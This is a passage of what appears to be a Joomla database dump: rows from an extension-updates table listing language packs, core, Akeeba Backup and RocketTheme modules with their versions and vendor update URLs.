Simplified','','pkg_zh-CN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(9706,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(9707,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(9708,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(9709,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(9710,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(9711,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(9712,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(9713,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(9714,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(9715,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(9716,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(9717,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(9718,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(9719,57,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(9720,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(9721,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(9722,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(9723,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(9724,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(9725,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(9726,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(9727,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(9728,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(9729,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(9730,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(9731,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(9732,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(9733,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(9734,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(9735,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(9736,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(9737,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(9738,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(9739,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(9740,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(9741,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(9742,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(9743,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(9744,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.10','','http://cdn.akeebabackup.com/updates/fef.xml','\n			https://www.akeebabackup.com/download/fef/1-0-10.html			\n		',''),(9745,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(9746,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-5-1.html			\n		',''),(9748,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9749,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9750,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(9751,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9752,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9753,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(9754,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(9755,3,0,'French','','pkg_fr-FR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(9756,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(9757,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(9758,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(9759,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(9760,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(9761,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(9762,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(9763,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(9764,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(9765,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(9766,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(9767,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(9768,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(9769,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(9770,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(9771,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(9772,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(9773,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(9774,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(9775,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(9776,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(9777,3,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(9778,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(9779,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(9780,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(9781,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(9782,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(9783,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(9784,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(9785,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(9786,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(9787,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(9788,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(9789,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(9790,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(9791,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(9792,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(9793,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(9794,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(9795,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(9796,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(9797,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(9798,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(9799,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(9800,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(9801,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9802,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(9803,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(9804,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(9805,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(9806,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(9807,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(9808,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(9809,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(9810,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(9811,57,0,'French','','pkg_fr-FR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(9812,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(9813,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(9814,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(9815,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(9816,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(9817,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(9818,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(9819,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(9820,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(9821,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(9822,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(9823,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(9824,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(9825,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(9826,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(9827,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(9828,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(9829,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(9830,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(9831,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(9832,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(9833,57,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(9834,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(9835,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(9836,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(9837,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(9838,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(9839,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(9840,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(9841,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(9842,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(9843,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(9844,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(9845,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(9846,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(9847,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(9848,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(9849,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(9850,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(9851,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(9852,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(9853,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(9854,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(9855,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(9856,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(9857,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(9858,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.10','','http://cdn.akeebabackup.com/updates/fef.xml','\n			https://www.akeebabackup.com/download/fef/1-0-10.html			\n		',''),(9859,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(9860,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-5-1.html			\n		',''),(9861,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9862,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(9863,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9864,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9865,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9866,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9867,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(9868,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9869,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9870,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9871,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9872,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(9873,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9874,1,0,'Joomla','','joomla','file','',0,'3.9.14','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(9875,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(9876,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(9877,3,0,'French','','pkg_fr-FR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(9878,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(9879,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(9880,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(9881,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(9882,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(9883,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(9884,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(9885,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(9886,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(9887,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(9888,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(9889,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(9890,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(9891,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(9892,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(9893,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(9894,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(9895,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(9896,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(9897,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(9898,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(9899,3,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(9900,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(9901,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(9902,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(9903,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(9904,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(9905,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(9906,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(9907,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(9908,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(9909,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(9910,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(9911,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(9912,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(9913,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(9914,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(9915,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(9916,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(9917,3,0,'German 